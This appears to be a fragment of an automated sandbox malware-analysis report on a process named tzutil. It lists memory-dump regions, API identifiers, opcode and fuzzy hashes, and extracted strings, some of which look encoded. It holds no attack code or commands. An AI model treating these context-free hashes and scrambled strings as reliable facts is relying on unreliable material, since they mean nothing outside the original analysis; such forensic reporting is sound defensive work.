                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00AB2150,00AC82FF,?,00AB211B), ref: 00AB8591
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_aa0000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                              • API String ID: 0-3558027158
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Strings
                                                              • ExecuteOptions, xrefs: 034046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03404742
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03404725
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03404655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03404787
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 034046FC
                                                              • Execute=1, xrefs: 03404713
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2603802961.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_31c0000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                              • API String ID: 0-1416458366
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 0340031E
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034002E7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 03407BAC
                                                              • RTL: Resource at %p, xrefs: 03407B8E
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03407B7F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0340728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 034072C1
                                                              • RTL: Resource at %p, xrefs: 034072A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03407294
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 9494f414de711440892e61a40495c664292b65300375972f47ed3d564b67c8bc
                                                              • Instruction ID: e4b0e642c3948f8d6d6f720ef08427d656064cbd0d0a88c5b7419f433db31109
                                                              • Opcode Fuzzy Hash: 9494f414de711440892e61a40495c664292b65300375972f47ed3d564b67c8bc
                                                              • Instruction Fuzzy Hash: CB41FE35704256AFC720DE25CC82B6AFBA9FB44710F14062EF855AF680DB31F8528BD6
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 407ae242d043cd9fe0f4f7b85265e32795484e72daebe3e22918152da507d4c0
                                                              • Instruction ID: bb42ec9596744953d1f9c2e96f90ad4c4b0d5afc13ff99d4e29730fd8c0439fb
                                                              • Opcode Fuzzy Hash: 407ae242d043cd9fe0f4f7b85265e32795484e72daebe3e22918152da507d4c0
                                                              • Instruction Fuzzy Hash: A1315776A006299FDB60DF39DC40BEFB7B8EB44610F444966E849E7240EB709A458B64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: 3feceed6c17081e145a59fa516133aed9e5dd0a909c189cee6ad251dc4784ead
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: C891C272E002169BDB34CE69ECC16BEF7A9FF44320F58461AE865EB2D0D73499418750
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 4f44547a27ce78b206e103f2518c3de56cb3e7e5631dc174e6f9b4b0aad62ad5
                                                              • Instruction ID: d7f5e8f1ee2e2a2e027ec28e6a4c8101c495504eebb431e52d245d5d1029efbb
                                                              • Opcode Fuzzy Hash: 4f44547a27ce78b206e103f2518c3de56cb3e7e5631dc174e6f9b4b0aad62ad5
                                                              • Instruction Fuzzy Hash: DE812D76D01269DFDB35DB54CC84BEEB7B8AB08710F0445DAAA19B7640D7705E84CFA0
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0341CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Offset: 03360000, based on PE: true
                                                              • Associated: 00000009.00000002.2604107733.0000000003489000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.000000000348D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_3360000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4_w@4_w
                                                              • API String ID: 4062629308-713214301
                                                              • Opcode ID: 6944017242e1b4047e9c25b389c04f8f0ca4584eb1d06a4709e6981ac0f30e01
                                                              • Instruction ID: c472745d32664a089d636a0a8bd5dbed9cbda397f241f0f76d2128ab90b9be6b
                                                              • Opcode Fuzzy Hash: 6944017242e1b4047e9c25b389c04f8f0ca4584eb1d06a4709e6981ac0f30e01
                                                              • Instruction Fuzzy Hash: A2418EB9D00614DFCB21EF99C880AAEBBB8EF46B14F14452BE915DF264D734C811CB69